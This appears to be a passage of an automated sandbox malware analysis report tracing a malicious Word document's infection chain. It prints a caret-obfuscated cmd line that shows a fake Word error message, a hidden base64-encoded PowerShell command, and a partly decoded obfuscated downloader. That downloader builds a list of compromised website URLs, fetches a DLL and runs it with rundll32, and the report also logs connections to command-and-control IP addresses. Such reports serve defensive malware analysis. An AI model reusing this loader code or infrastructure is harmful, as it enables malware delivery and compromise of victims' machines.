                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2109740274.0000000000364000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.15.7.145 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded $9Ms63 = [TyPe]("{0}{2}{1}{3}" -f 'SYstE','O.Direc','m.I','tOrY'); SEt-vArIABle yQKmt ( [TyPE]("{0}{5}{7}{4}{8}{1}{6}{3}{2}"-f'SYS','ICepoInT','eR','AG','.SeR','tEM.Ne','mAN','T','V') ); $Bb2u2c9=$X27F + [char](64) + $Z12G;$R84F=('Q2'+'0L'); ( chiLditem vaRiable:9MS63).valuE::"crEatE`DI`RecTORy"($HOME + (('W'+'0f'+'O'+'cm'+'d_'+'k'+('eW0'+'f')+('Qqw8nb'+'hW'+'0f'))."RE`pLacE"(([CHAR]87+[CHAR]48+[CHAR]102),'\')));$M67N=(('M'+'29')+'D'); $YQKMt::"sEC`U`RIt`YProt`Ocol" = ('T'+('l'+'s12'));$L10B=('P'+('68'+'R'));$Uzi1h1q = ('A'+('30'+'F'));$L55O=('T'+('67'+'Y'));$Rdtal4v=$HOME+(('{0}Ocm'+'d'+'_ke{'+'0}Qq'+('w'+'8nb')+'h'+'{0}')-F[ChaR]92)+$Uzi1h1q+('.d'+'ll');$L72Q=('X4'+'_S');$Nszo8i1=('sg'+(' yw'+' a')+('h://ket'+'or'+'e')+('se'+'t')+('m'+'e.com/')+('w'+'p-')+('c'+'on')+'t'+'e'+('nt'+'/Rk')+'4r'+'z/'+('@s'+'g yw'+' a')+'h'+':/'+'/i'+('nte'+'lli')+'s'+('a'+'vvy.c')+'o'+'m/'+('wp'+'-')+('admin'+'/d'+'R')+'aG'+('2H'+'/@sg')+' '+('y'+'w ')+('a'+'hs:')+'/'+'/m'+('rv'+'e'+'ggy.c')+('o'+'m/')+'wp'+('-adm'+'i')+('n/'+'n')+'/@'+'s'+'g '+('yw ahs'+'://h'+'b')+'pr'+('ivile'+'g'+'ed')+('.com'+'/c'+'gi'+'-bin/Q')+('g'+'/@')+('s'+'g ')+'yw'+(' ahs:'+'/')+('/theo'+'.')+'d'+('ig'+'i')+('tal'+'/w')+('p'+'-ad'+'min')+('/'+'Zyl')+'2'+('/@'+'s')+'g '+('yw ah'+'s:'+'//u')+'mm'+'ah'+'s'+('ta'+'rs.')+('c'+'om/')+'a'+'pp'+'_'+'ol'+'d'+'_m'+'a'+('y_'+'2')+'0'+'18'+'/a'+('sset'+'s')+('/'+'wDL8x/@sg'+' ')+('yw'+' ahs:/')+'/w'+'w'+('w.t'+'ee')+('le'+'kded')+'.c'+('om'+'/c')+('gi-b'+'i')+('n
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $9Ms63 = [TyPe]("{0}{2}{1}{3}" -f 'SYstE','O.Direc','m.I','tOrY'); SEt-vArIABle yQKmt ( [TyPE]("{0}{5}{7}{4}{8}{1}{6}{3}{2}"-f'SYS','ICepoInT','eR','AG','.SeR','tEM.Ne','mAN','T','V') ); $Bb2u2c9=$X27F + [char](64) + $Z12G;$R84F=('Q2'+'0L'); ( chiLditem vaRiable:9MS63).valuE::"crEatE`DI`RecTORy"($HOME + (('W'+'0f'+'O'+'cm'+'d_'+'k'+('eW0'+'f')+('Qqw8nb'+'hW'+'0f'))."RE`pLacE"(([CHAR]87+[CHAR]48+[CHAR]102),'\')));$M67N=(('M'+'29')+'D'); $YQKMt::"sEC`U`RIt`YProt`Ocol" = ('T'+('l'+'s12'));$L10B=('P'+('68'+'R'));$Uzi1h1q = ('A'+('30'+'F'));$L55O=('T'+('67'+'Y'));$Rdtal4v=$HOME+(('{0}Ocm'+'d'+'_ke{'+'0}Qq'+('w'+'8nb')+'h'+'{0}')-F[ChaR]92)+$Uzi1h1q+('.d'+'ll');$L72Q=('X4'+'_S');$Nszo8i1=('sg'+(' yw'+' a')+('h://ket'+'or'+'e')+('se'+'t')+('m'+'e.com/')+('w'+'p-')+('c'+'on')+'t'+'e'+('nt'+'/Rk')+'4r'+'z/'+('@s'+'g yw'+' a')+'h'+':/'+'/i'+('nte'+'lli')+'s'+('a'+'vvy.c')+'o'+'m/'+('wp'+'-')+('admin'+'/d'+'R')+'aG'+('2H'+'/@sg')+' '+('y'+'w ')+('a'+'hs:')+'/'+'/m'+('rv'+'e'+'ggy.c')+('o'+'m/')+'wp'+('-adm'+'i')+('n/'+'n')+'/@'+'s'+'g '+('yw ahs'+'://h'+'b')+'pr'+('ivile'+'g'+'ed')+('.com'+'/c'+'gi'+'-bin/Q')+('g'+'/@')+('s'+'g ')+'yw'+(' ahs:'+'/')+('/theo'+'.')+'d'+('ig'+'i')+('tal'+'/w')+('p'+'-ad'+'min')+('/'+'Zyl')+'2'+('/@'+'s')+'g '+('yw ah'+'s:'+'//u')+'mm'+'ah'+'s'+('ta'+'rs.')+('c'+'om/')+'a'+'pp'+'_'+'ol'+'d'+'_m'+'a'+('y_'+'2')+'0'+'18'+'/a'+('sset'+'s')+('/'+'wDL8x/@sg'+' ')+('yw'+' ahs:/')+'/w'+'w'+('w.t'+'ee')+('le'+'kded')+'.c'+('om'+'/c')+('gi-b'+'i')+('n
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHE